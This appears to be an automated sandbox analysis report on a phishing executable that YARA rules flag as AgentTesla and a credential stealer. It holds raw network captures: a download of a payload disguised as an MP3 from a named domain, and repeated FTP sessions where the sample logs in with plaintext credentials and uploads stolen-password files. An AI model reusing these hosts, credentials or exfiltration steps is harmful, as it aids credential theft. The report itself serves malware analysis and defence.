                                        2024-10-08 06:56:11 UTC8000INData Raw: a1 7f e2 d5 a6 4f 45 8c 87 cb 8d 31 2e f2 dd 17 a0 36 b4 d3 57 39 a5 50 d2 d5 bb ba 9b fe ed 39 d3 c8 9d 0e 08 60 bc 54 10 7a ca 67 61 c2 97 91 39 71 8f 5a e9 07 41 30 f1 ca fa 9d 0e d1 8b ec e6 78 6d e0 5a 8d 71 8e 3e 26 9e b4 c0 1f b6 f9 06 6a 25 f2 7c 27 96 c5 b5 bb ce 4f 5f a0 72 2b 90 90 59 55 f2 8a 03 df b7 6d b5 3b 1b 24 fb ab ae c8 00 e2 ef af 2d 6a dc 30 c5 50 1f bf ff 81 87 96 a9 b9 b8 b8 d2 c5 c9 b0 29 8a 16 92 34 d2 18 99 cc 1e 5e 25 23 dc 84 22 36 d9 f8 9a 3b 29 cc 7c ab eb 60 3c 4e 9b 65 32 3b 1a 52 c9 63 8a b2 08 4f 7d 85 e7 bb ab 89 14 a5 05 ee 5c 1a 14 81 74 3e 14 b4 08 da fb 56 6a 0a c1 ef 4e 94 04 7e f5 b1 8a e1 73 bd e5 26 2a 61 79 54 59 1d 85 c7 43 1e 4f 8b 70 f9 7d ed d3 76 ea e6 3f 00 4c dc 44 c1 70 3c 9d b8 40 e3 c0 24 11 f2 c4 b1
                                        Data Ascii: OE1.6W9P9`Tzga9qZA0xmZq>&j%|'O_r+YUm;$-j0P)4^%#"6;)|`<Ne2;RcO}\t>VjN~s&*ayTYCOp}v?LDp<@$
                                        2024-10-08 06:56:11 UTC8000INData Raw: 86 11 d0 30 a7 b3 57 b8 bc 3e f2 c3 6d 57 6a 03 4c 52 4e 92 4d 1c 92 26 8d 06 8d ae 50 b2 25 da 2b a9 01 f7 4c f4 47 28 65 4c 1d f2 8f ac c8 3a 09 fa ab 37 2f 8b 98 a9 f7 76 e2 fa b0 79 97 2c 51 c3 62 79 4a 0a d8 b2 de b8 8b 79 03 a5 13 bc bd 69 ce a3 74 d9 ad da 85 d7 b0 a8 e0 65 c3 50 ca fe 01 ef ee eb c3 70 40 e9 7b 4d 56 4f 8a 75 c1 e9 45 05 87 db c3 3c 92 2e ed d1 15 00 89 89 30 a6 80 c6 49 91 8a 1b 75 e0 34 51 6b 8a b8 33 66 56 fb 2e 26 0e 3b 06 69 78 69 ad bb 18 9d 09 96 86 62 b5 a9 6e 65 ff a7 dc 0f 9c ec a9 36 bd e4 21 69 be 30 86 f7 8f 9d 48 4f 73 57 4f 16 77 28 19 dd b2 db 1d fd 18 28 2e 22 03 6e 2f ec a2 e6 d1 66 97 9b 80 37 c7 bc 11 9c 4e f0 73 75 c9 b6 6b c4 34 19 0c b8 ff 76 24 61 4b 30 f7 72 69 2d c7 70 76 cc a7 e2 f0 8f 50 65 28 a6 6a 5a
                                        Data Ascii: 0W>mWjLRNM&P%+LG(eL:7/vy,QbyJyitePp@{MVOuE<.0Iu4Qk3fV.&;ixibne6!i0HOsWOw((."n/f7Nsuk4v$aK0ri-pvPe(jZ
                                        2024-10-08 06:56:11 UTC8000INData Raw: 22 63 0c 26 ed c8 67 c2 5c 7b c2 b3 5f 01 b1 9d d9 0c ca 88 ea 9f dc 3a 21 d2 06 31 e0 8e 79 a9 3c f4 47 c5 39 9d 9b 75 29 d0 73 a6 26 40 ab a6 bc 13 22 0f 70 cd 7f 37 7e b7 c2 c4 1f d2 04 41 b3 8e fe d7 fc 3b e4 61 43 02 0e 42 23 18 77 60 21 76 63 99 d4 d0 7d 5e 77 8d 96 12 f9 2d d6 0e 16 ce 14 b1 e7 92 66 c4 e3 f6 d8 39 2b 80 94 da f5 e0 a7 a5 ef 67 86 2a 2d 2b ca 7d 23 58 bd 04 f9 d0 15 e1 18 18 1f 36 3d 4a 0c 14 f2 6a 84 61 5c 61 45 9c 64 a6 fb a3 b0 ea 7a a5 0d cc 0d 0c ca 46 ab 63 40 fd 6c 8f af ce 9a 70 1f e1 67 c4 43 0b bb da f3 1d a5 78 85 aa 23 83 33 82 4c 95 65 71 82 71 c7 66 8e 81 6b 3a 12 c6 0f bd ad d5 97 64 81 f3 3a 84 06 0f 7e 36 9f dc b9 05 ed 7f 3b f0 c3 80 c3 78 19 84 25 fb 30 bd 60 44 9c 59 72 4f af 5d 87 c0 a2 d7 5b c5 9e be 9e a1 74
                                        Data Ascii: "c&g\{_:!1y<G9u)s&@"p7~A;aCB#w`!vc}^w-f9+g*-+}#X6=Jja\aEdzFc@lpgCx#3Leqqfk:d:~6;x%0`DYrO][t


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.94985667.212.175.1624438144C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 06:56:19 UTC82OUTGET /dfsd/Wulwtq.mp3 HTTP/1.1
                                        Host: wymascensores.com
                                        Connection: Keep-Alive
                                        2024-10-08 06:56:19 UTC209INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 06:56:19 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 08 Oct 2024 03:42:59 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 957960
                                        Connection: close
                                        Content-Type: audio/mpeg
                                        2024-10-08 06:56:19 UTC7983INData Raw: 33 64 82 05 ab bb 17 50 bf 89 60 25 e5 94 f7 6e fb 7f 8d b0 c4 ed 6b 3d 39 fa 30 da 6b aa e6 ce 33 87 a2 d2 8d 35 f2 f3 29 a8 30 a1 b8 62 f3 69 90 4d c4 9f 7d 1b 2a ad 34 e1 42 fa a0 d0 79 c8 4f a8 a4 ac c0 ce 4b 47 85 e2 cc db 6a bc e8 54 22 36 67 ab ab cc 7d 1b 87 9d b8 4c 0f d0 42 a0 57 58 e3 b8 d7 78 30 34 78 62 84 72 9b 04 d3 26 85 3d be b1 1c ff 9d c5 31 08 a3 6a 9d 19 03 c8 0a 01 48 09 a5 21 c8 06 7a 52 71 a0 66 19 bf 03 ee 2d 6d 4b d9 dc 34 4c 4c 89 18 6d 62 eb ed c0 a6 e9 87 17 00 34 40 83 4c bd 3a 2c b4 ff be d6 a3 d2 e0 bc 49 97 dc 60 56 09 4d 96 36 9d e1 37 9d 6d 88 31 0f 57 be 62 ff 0a 39 fd 3e ec fc c0 65 ea a2 c3 59 d3 b4 b9 b3 5c aa 89 48 8d 53 cb a3 4a cb 61 36 31 51 48 6d 52 03 23 62 34 6c 00 e3 44 86 f2 8c b4 3f 38 67 e3 9d 6d e0 ca f2
                                        Data Ascii: 3dP`%nk=90k35)0biM}*4ByOKGjT"6g}LBWXx04xbr&=1jH!zRqf-mK4LLmb4@L:,I`VM67m1Wb9>eY\HSJa61QHmR#b4lD?8gm
                                        2024-10-08 06:56:19 UTC8000INData Raw: e3 82 11 ca 60 97 19 5e ce de 66 ed 70 dd 49 7d de 60 54 6f 33 5c 55 f8 c6 10 ff 4a 49 5c d7 5f 6e 14 4c b3 4b 9b 3d 3e fd 02 3e c6 7d 24 35 32 8c 26 98 c6 81 2e cf a9 ae 82 05 d7 da d1 cf 3f 8f 3e 4d 77 3a 46 17 f8 d6 e1 83 af eb 01 63 0b 86 67 80 fe 3d 06 3e 3f ad 1a 1c 29 ae 68 6c e5 f8 cd f3 55 fe a6 65 89 42 5c 7f 7c eb f9 c6 a9 65 d6 3c 50 cc bb 5e 2a fb 62 30 d2 68 89 62 12 f0 57 e8 71 0a 3a 17 16 97 ab 01 8d 5a 8c ae d0 e3 7c 90 32 3f fd a7 23 a8 43 47 dd bd 74 40 f8 7a 07 d6 a5 0c 43 3e 58 d5 17 20 5c ae f4 8d ad 99 4f b5 b6 f2 0a 17 6c 62 4f c9 fa fa 53 4a d2 eb 03 04 36 eb 36 21 f0 b0 7b df bb e2 d3 fb 14 14 09 2a 09 d8 a6 44 2a 8f 2b 65 64 9a 8f 4c 9e 34 da 6f e0 8d 9c 71 fc 89 b8 ab 3f 75 95 73 f3 6f 34 04 d7 7b fa 3d 6e 71 c0 9e 18 8d cb 82
                                        Data Ascii: `^fpI}`To3\UJI\_nLK=>>}$52&.?>Mw:Fcg=>?)hlUeB\|e<P^*b0hbWq:Z|2?#CGt@zC>X \OlbOSJ66!{*D*+edL4oq?uso4{=nq
                                        2024-10-08 06:56:19 UTC8000INData Raw: 08 a8 31 76 62 aa 00 22 2a 2f fa 82 d5 53 04 c9 bb 7b 5b a1 85 06 55 6b a9 99 0e 60 79 23 50 6d 8f bd d5 fd 37 12 a7 b1 1e e4 44 5a fe af 23 da 7f 88 29 df c5 98 8f f6 aa 58 89 52 ae c3 62 f6 e6 3d 21 c1 6a a9 45 7c 36 57 24 39 c6 78 02 96 33 2a 80 8e 1c 5e dc d9 89 9c b3 b6 e6 2b 35 d9 64 4d 70 9b a4 92 37 2e 0f b7 c6 1c 17 7e 8b b5 41 6d 7e 6b 68 08 0a 08 69 46 8c f3 a5 d1 88 4f d4 07 d6 7c 53 ed 16 41 98 71 f4 f7 4f d4 b8 be b3 66 09 48 2d 71 87 9d a1 40 a6 0a dd e0 2d 16 23 aa c3 c5 80 ea 58 0e 34 e1 da 50 89 b8 fe 0c 99 4a b7 71 65 93 90 92 31 c4 3d a4 a3 2c 04 2e a1 f3 cf 91 b9 52 e6 aa e6 84 0e 2a 99 ae 94 24 93 0c aa ca ef 91 b3 d6 46 ac f2 fc f1 4a 06 1c 1f 8d 26 f5 eb 66 f2 84 76 76 b9 41 79 ff cb f4 53 da 5a 42 09 8a 86 ba 4f 76 78 ba e1 00 eb
                                        Data Ascii: 1vb"*/S{[Uk`y#Pm7DZ#)XRb=!jE|6W$9x3*^+5dMp7.~Am~khiFO|SAqOfH-q@-#X4PJqe1=,.R*$FJ&fvvAySZBOvx
                                        2024-10-08 06:56:19 UTC8000INData Raw: fb 0f 9c a1 b5 3f ca 9a d9 2c 2e 79 73 40 b8 69 d0 e6 ac 30 90 2c 9b 28 59 9a ef 1a 4c e6 60 71 fa bc 00 70 63 90 90 55 08 22 4b 28 65 16 b7 f1 b8 92 14 aa 96 21 8c df 9b 17 e7 d3 7a a9 9c 4b a3 c9 60 e3 98 e6 8c 3b 01 ca 8b 94 c8 f0 b1 e6 fa 51 7d 85 8f c4 08 f6 d5 a3 4b ce 80 33 0d 26 7e 7f 05 d0 52 15 cc bb a4 03 ef f3 13 d8 78 82 b6 a7 3d be cf 21 8e c4 6a 7f 38 9a 28 8a 39 1c 2f bf 38 6b c6 35 e9 c7 59 e3 c5 dc 13 d8 f0 3b 27 7b 50 41 43 38 c0 ae 50 47 b6 51 7f c5 17 a4 fd 26 00 a5 16 48 d7 f9 34 24 17 77 e9 f6 a5 bf 99 6c 6d ce de 96 c5 be 74 53 32 6a d4 d1 bc 71 6c 2b 54 2d 69 59 93 41 db b5 08 da 15 96 96 7a 2c 85 f2 ad 30 72 dc 96 4c f9 a9 60 28 56 47 05 ae 6f af 1f 4e 27 ee 3c ee 48 6c 2f cf 59 59 5e bb 14 12 ef 40 db 47 ba 7d 40 c5 34 99 9a 8c
                                        Data Ascii: ?,.ys@i0,(YL`qpcU"K(e!zK`;Q}K3&~Rx=!j8(9/8k5Y;'{PAC8PGQ&H4$wlmtS2jql+T-iYAz,0rL`(VGoN'<Hl/YY^@G}@4
                                        2024-10-08 06:56:19 UTC8000INData Raw: 32 b6 28 f9 20 83 c7 24 14 17 7b e8 3c 6f 2e 9b 7c a5 dd 6e 9b 43 33 b2 98 10 1d a3 a4 7a 27 f5 da 80 aa 8a 04 8f bb 8c 44 46 26 c4 7b 3a a2 ce 5c fc 7c e6 ef 56 5a 68 f3 c0 2e ad fd b8 74 7c c4 32 ea 11 fe d1 22 24 94 98 30 0d e3 6b dd 74 b1 bc 76 d4 70 f9 f6 24 af 67 e0 4d f1 f7 c8 42 0f b2 da 3f 19 88 da a7 2a 0f 14 b2 3a 4d 1e 11 8c ec 1d 09 59 7b 10 e4 b9 90 72 64 26 68 da 40 e2 0a 80 c8 ff b2 23 cc 87 ff 81 08 f7 c5 ab f5 44 57 b2 f8 28 dc 40 e7 b0 6e d5 ab 78 64 8f 0c 11 a4 69 01 73 f2 fa 98 46 b9 32 15 42 8d 00 51 15 02 9a a8 5f 62 d6 a6 c2 e9 8e 49 08 e2 6d 64 5b 8e c7 b7 71 5e 33 f2 b8 34 2c e5 71 31 5a ec 15 2b 0f 2b 8a 55 ba a3 fc d0 af fa ee b1 eb 4c c7 f9 8e 68 29 22 53 13 5f ac b9 3f f4 1b f5 c5 75 da b2 92 6f f6 28 b8 ea bc d2 e1 41 d3 09
                                        Data Ascii: 2( ${<o.|nC3z'DF&{:\|VZh.t|2"$0ktvp$gMB?*:MY{rd&h@#DW(@nxdisF2BQ_bImd[q^34,q1Z++ULh)"S_?uo(A
                                        2024-10-08 06:56:19 UTC8000INData Raw: 6b fa 9d 66 d5 8e 26 09 d7 dd 43 d6 75 4b 07 fc 08 13 9f 30 62 bb 23 53 6e d6 2b d6 6e 08 33 45 53 88 73 4c 46 fe b4 d6 fa a1 cd 6a da bf 51 de 44 b3 77 f4 dd c1 33 0b c3 0f 5a ac ce b2 aa 01 3e 44 0b 63 0b 35 6d c5 96 5a 70 74 e3 c6 74 89 ee ef 9a ac 71 ed e3 65 8b 61 b9 e0 71 84 7f ec d4 4e 87 fa f1 eb d6 c1 07 09 b8 d6 33 94 3f 44 58 3b ac 30 2a 9d 16 cb 3e fd d8 a8 3e ac 64 a6 ea 1b a2 69 6d 1c 27 12 ef 90 83 e8 a6 bd 0a 88 be da 94 e7 89 be 6d 1b 08 ec ee 47 72 97 2d 11 d2 a7 7e b1 d3 23 c6 9f c5 3a df 5c 78 0a 88 31 b4 a1 ca c7 50 8d ce fc 33 cb 23 6c 5a 62 b2 1f 5f 90 86 6e 4a b6 66 43 1a 56 84 7c d3 3a 2e f4 a2 2c 57 66 b7 b3 c5 53 06 01 49 2a f4 27 08 d1 4b f5 80 c3 eb 51 60 e8 58 91 3e 11 0c 86 d0 27 d3 2d 86 42 eb d5 32 f6 4d 78 e4 2a e1 35 d0
                                        Data Ascii: kf&CuK0b#Sn+n3ESsLFjQDw3Z>Dc5mZpttqeaqN3?DX;0*>>dim'mGr-~#:\x1P3#lZb_nJfCV|:.,WfSI*'KQ`X>'-B2Mx*5
                                        2024-10-08 06:56:19 UTC8000INData Raw: a2 a4 20 fa c4 68 59 b1 bb df 0c 62 22 a3 e6 9d 94 1c 71 c9 cb 4b c2 fc d1 fd 8d 6c e7 28 1d 04 d3 48 69 75 f2 c7 8d 87 2b d1 f9 ef bb 34 ab f3 59 90 17 e0 f7 03 7e 76 ca 7b ac 9c a1 40 d7 04 1d de 97 dc 64 aa c9 cc c1 78 28 9c d5 94 e6 5d 40 f4 89 f4 dd 9c c0 35 ec ed 98 3b a2 af e2 21 7a d8 b7 bb 75 71 56 5c a2 72 c3 09 e9 3c d8 ca e1 35 34 a8 c9 95 a8 8e 28 e0 85 79 57 dc 96 67 c5 f4 15 95 3a fe c6 36 34 e0 64 2b 94 82 e3 55 31 4a da 09 56 4b 06 f7 c0 bf 71 5b b8 94 7c 19 bf 93 b0 de 87 00 24 b8 8d d6 15 8e f4 f0 eb 55 bf 8c 88 b2 c9 4d 96 82 51 87 16 82 b5 0f df d2 e2 51 23 da 55 e1 4d 13 c3 cd 35 7f 0a 26 aa 7b ec 2c a6 7f 60 f4 92 52 28 33 e9 cb 83 0a 06 27 78 b2 a7 f2 de 67 5c 5d e9 3a 58 f0 bf 32 32 5d 83 c4 ed dc 76 8f ad 40 d8 a2 0a 23 a1 1f ee
                                        Data Ascii: hYb"qKl(Hiu+4Y~v{@dx(]@5;!zuqV\r<54(yWg:64d+U1JVKq[|$UMQQ#UM5&{,`R(3'xg\]:X22]v@#
                                        2024-10-08 06:56:19 UTC8000INData Raw: a1 7f e2 d5 a6 4f 45 8c 87 cb 8d 31 2e f2 dd 17 a0 36 b4 d3 57 39 a5 50 d2 d5 bb ba 9b fe ed 39 d3 c8 9d 0e 08 60 bc 54 10 7a ca 67 61 c2 97 91 39 71 8f 5a e9 07 41 30 f1 ca fa 9d 0e d1 8b ec e6 78 6d e0 5a 8d 71 8e 3e 26 9e b4 c0 1f b6 f9 06 6a 25 f2 7c 27 96 c5 b5 bb ce 4f 5f a0 72 2b 90 90 59 55 f2 8a 03 df b7 6d b5 3b 1b 24 fb ab ae c8 00 e2 ef af 2d 6a dc 30 c5 50 1f bf ff 81 87 96 a9 b9 b8 b8 d2 c5 c9 b0 29 8a 16 92 34 d2 18 99 cc 1e 5e 25 23 dc 84 22 36 d9 f8 9a 3b 29 cc 7c ab eb 60 3c 4e 9b 65 32 3b 1a 52 c9 63 8a b2 08 4f 7d 85 e7 bb ab 89 14 a5 05 ee 5c 1a 14 81 74 3e 14 b4 08 da fb 56 6a 0a c1 ef 4e 94 04 7e f5 b1 8a e1 73 bd e5 26 2a 61 79 54 59 1d 85 c7 43 1e 4f 8b 70 f9 7d ed d3 76 ea e6 3f 00 4c dc 44 c1 70 3c 9d b8 40 e3 c0 24 11 f2 c4 b1
                                        Data Ascii: OE1.6W9P9`Tzga9qZA0xmZq>&j%|'O_r+YUm;$-j0P)4^%#"6;)|`<Ne2;RcO}\t>VjN~s&*ayTYCOp}v?LDp<@$
                                        2024-10-08 06:56:19 UTC8000INData Raw: 86 11 d0 30 a7 b3 57 b8 bc 3e f2 c3 6d 57 6a 03 4c 52 4e 92 4d 1c 92 26 8d 06 8d ae 50 b2 25 da 2b a9 01 f7 4c f4 47 28 65 4c 1d f2 8f ac c8 3a 09 fa ab 37 2f 8b 98 a9 f7 76 e2 fa b0 79 97 2c 51 c3 62 79 4a 0a d8 b2 de b8 8b 79 03 a5 13 bc bd 69 ce a3 74 d9 ad da 85 d7 b0 a8 e0 65 c3 50 ca fe 01 ef ee eb c3 70 40 e9 7b 4d 56 4f 8a 75 c1 e9 45 05 87 db c3 3c 92 2e ed d1 15 00 89 89 30 a6 80 c6 49 91 8a 1b 75 e0 34 51 6b 8a b8 33 66 56 fb 2e 26 0e 3b 06 69 78 69 ad bb 18 9d 09 96 86 62 b5 a9 6e 65 ff a7 dc 0f 9c ec a9 36 bd e4 21 69 be 30 86 f7 8f 9d 48 4f 73 57 4f 16 77 28 19 dd b2 db 1d fd 18 28 2e 22 03 6e 2f ec a2 e6 d1 66 97 9b 80 37 c7 bc 11 9c 4e f0 73 75 c9 b6 6b c4 34 19 0c b8 ff 76 24 61 4b 30 f7 72 69 2d c7 70 76 cc a7 e2 f0 8f 50 65 28 a6 6a 5a
                                        Data Ascii: 0W>mWjLRNM&P%+LG(eL:7/vy,QbyJyitePp@{MVOuE<.0Iu4Qk3fV.&;ixibne6!i0HOsWOw((."n/f7Nsuk4v$aK0ri-pvPe(jZ
                                        2024-10-08 06:56:19 UTC8000INData Raw: 22 63 0c 26 ed c8 67 c2 5c 7b c2 b3 5f 01 b1 9d d9 0c ca 88 ea 9f dc 3a 21 d2 06 31 e0 8e 79 a9 3c f4 47 c5 39 9d 9b 75 29 d0 73 a6 26 40 ab a6 bc 13 22 0f 70 cd 7f 37 7e b7 c2 c4 1f d2 04 41 b3 8e fe d7 fc 3b e4 61 43 02 0e 42 23 18 77 60 21 76 63 99 d4 d0 7d 5e 77 8d 96 12 f9 2d d6 0e 16 ce 14 b1 e7 92 66 c4 e3 f6 d8 39 2b 80 94 da f5 e0 a7 a5 ef 67 86 2a 2d 2b ca 7d 23 58 bd 04 f9 d0 15 e1 18 18 1f 36 3d 4a 0c 14 f2 6a 84 61 5c 61 45 9c 64 a6 fb a3 b0 ea 7a a5 0d cc 0d 0c ca 46 ab 63 40 fd 6c 8f af ce 9a 70 1f e1 67 c4 43 0b bb da f3 1d a5 78 85 aa 23 83 33 82 4c 95 65 71 82 71 c7 66 8e 81 6b 3a 12 c6 0f bd ad d5 97 64 81 f3 3a 84 06 0f 7e 36 9f dc b9 05 ed 7f 3b f0 c3 80 c3 78 19 84 25 fb 30 bd 60 44 9c 59 72 4f af 5d 87 c0 a2 d7 5b c5 9e be 9e a1 74
                                        Data Ascii: "c&g\{_:!1y<G9u)s&@"p7~A;aCB#w`!vc}^w-f9+g*-+}#X6=Jja\aEdzFc@lpgCx#3Leqqfk:d:~6;x%0`DYrO][t


                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Oct 8, 2024 08:56:01.944909096 CEST21497425.2.84.236192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 09:56. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 8, 2024 08:56:01.945224047 CEST4974221192.168.2.95.2.84.236USER fgghv@alternatifplastik.com
                                        Oct 8, 2024 08:56:02.207434893 CEST21497425.2.84.236192.168.2.9331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 8, 2024 08:56:02.210995913 CEST4974221192.168.2.95.2.84.236PASS Fineboy777@
                                        Oct 8, 2024 08:56:02.575886965 CEST21497425.2.84.236192.168.2.9230 OK. Current restricted directory is /
                                        Oct 8, 2024 08:56:02.838076115 CEST21497425.2.84.236192.168.2.9504 Unknown command
                                        Oct 8, 2024 08:56:02.838272095 CEST4974221192.168.2.95.2.84.236PWD
                                        Oct 8, 2024 08:56:03.226980925 CEST21497425.2.84.236192.168.2.9257 "/" is your current location
                                        Oct 8, 2024 08:56:03.227145910 CEST4974221192.168.2.95.2.84.236TYPE I
                                        Oct 8, 2024 08:56:03.489248991 CEST21497425.2.84.236192.168.2.9200 TYPE is now 8-bit binary
                                        Oct 8, 2024 08:56:03.489409924 CEST4974221192.168.2.95.2.84.236PASV
                                        Oct 8, 2024 08:56:03.751243114 CEST21497425.2.84.236192.168.2.9227 Entering Passive Mode (5,2,84,236,216,8)
                                        Oct 8, 2024 08:56:03.760641098 CEST4974221192.168.2.95.2.84.236STOR PW_user-114127_2024_10_08_02_55_59.html
                                        Oct 8, 2024 08:56:04.457192898 CEST21497425.2.84.236192.168.2.9150 Accepted data connection
                                        Oct 8, 2024 08:56:04.730727911 CEST21497425.2.84.236192.168.2.9226-File successfully transferred
                                        226-File successfully transferred226 0.273 seconds (measured here), 1.14 Kbytes per second
                                        Oct 8, 2024 08:56:14.738740921 CEST21498215.2.84.236192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 09:56. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 8, 2024 08:56:14.747215033 CEST4982121192.168.2.95.2.84.236USER fgghv@alternatifplastik.com
                                        Oct 8, 2024 08:56:15.010965109 CEST21498215.2.84.236192.168.2.9331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 8, 2024 08:56:15.011281013 CEST4982121192.168.2.95.2.84.236PASS Fineboy777@
                                        Oct 8, 2024 08:56:15.298417091 CEST21498215.2.84.236192.168.2.9230 OK. Current restricted directory is /
                                        Oct 8, 2024 08:56:15.566858053 CEST21498215.2.84.236192.168.2.9504 Unknown command
                                        Oct 8, 2024 08:56:15.569318056 CEST4982121192.168.2.95.2.84.236PWD
                                        Oct 8, 2024 08:56:15.833127975 CEST21498215.2.84.236192.168.2.9257 "/" is your current location
                                        Oct 8, 2024 08:56:15.833623886 CEST4982121192.168.2.95.2.84.236TYPE I
                                        Oct 8, 2024 08:56:16.098943949 CEST21498215.2.84.236192.168.2.9200 TYPE is now 8-bit binary
                                        Oct 8, 2024 08:56:16.099241972 CEST4982121192.168.2.95.2.84.236PASV
                                        Oct 8, 2024 08:56:16.362982035 CEST21498215.2.84.236192.168.2.9227 Entering Passive Mode (5,2,84,236,201,49)
                                        Oct 8, 2024 08:56:16.368763924 CEST4982121192.168.2.95.2.84.236STOR PW_user-114127_2024_10_08_02_56_12.html
                                        Oct 8, 2024 08:56:17.061897993 CEST21498215.2.84.236192.168.2.9150 Accepted data connection
                                        Oct 8, 2024 08:56:17.326134920 CEST21498215.2.84.236192.168.2.9226-File successfully transferred
                                        226-File successfully transferred226 0.264 seconds (measured here), 1.18 Kbytes per second
                                        Oct 8, 2024 08:56:23.962723017 CEST21498835.2.84.236192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 09:56. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 8, 2024 08:56:23.963040113 CEST4988321192.168.2.95.2.84.236USER fgghv@alternatifplastik.com
                                        Oct 8, 2024 08:56:24.225641966 CEST21498835.2.84.236192.168.2.9331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 8, 2024 08:56:24.226006985 CEST4988321192.168.2.95.2.84.236PASS Fineboy777@
                                        Oct 8, 2024 08:56:24.510798931 CEST21498835.2.84.236192.168.2.9230 OK. Current restricted directory is /
                                        Oct 8, 2024 08:56:24.797842026 CEST21498835.2.84.236192.168.2.9504 Unknown command
                                        Oct 8, 2024 08:56:24.798604012 CEST4988321192.168.2.95.2.84.236PWD
                                        Oct 8, 2024 08:56:25.061342001 CEST21498835.2.84.236192.168.2.9257 "/" is your current location
                                        Oct 8, 2024 08:56:25.061484098 CEST4988321192.168.2.95.2.84.236TYPE I
                                        Oct 8, 2024 08:56:25.324621916 CEST21498835.2.84.236192.168.2.9200 TYPE is now 8-bit binary
                                        Oct 8, 2024 08:56:25.324769974 CEST4988321192.168.2.95.2.84.236PASV
                                        Oct 8, 2024 08:56:25.588062048 CEST21498835.2.84.236192.168.2.9227 Entering Passive Mode (5,2,84,236,243,93)
                                        Oct 8, 2024 08:56:25.599272013 CEST4988321192.168.2.95.2.84.236STOR PW_user-114127_2024_10_08_02_56_21.html
                                        Oct 8, 2024 08:56:26.304764986 CEST21498835.2.84.236192.168.2.9150 Accepted data connection
                                        Oct 8, 2024 08:56:26.567184925 CEST21498835.2.84.236192.168.2.9226-File successfully transferred
                                        226-File successfully transferred226 0.262 seconds (measured here), 1.19 Kbytes per second

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:02:55:55
                                        Start date:08/10/2024
                                        Path:C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe"
                                        Imagebase:0xc80000
                                        File size:975'872 bytes
                                        MD5 hash:B77B84072A85329568EA006B1B7F4201
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1366255411.0000000006440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
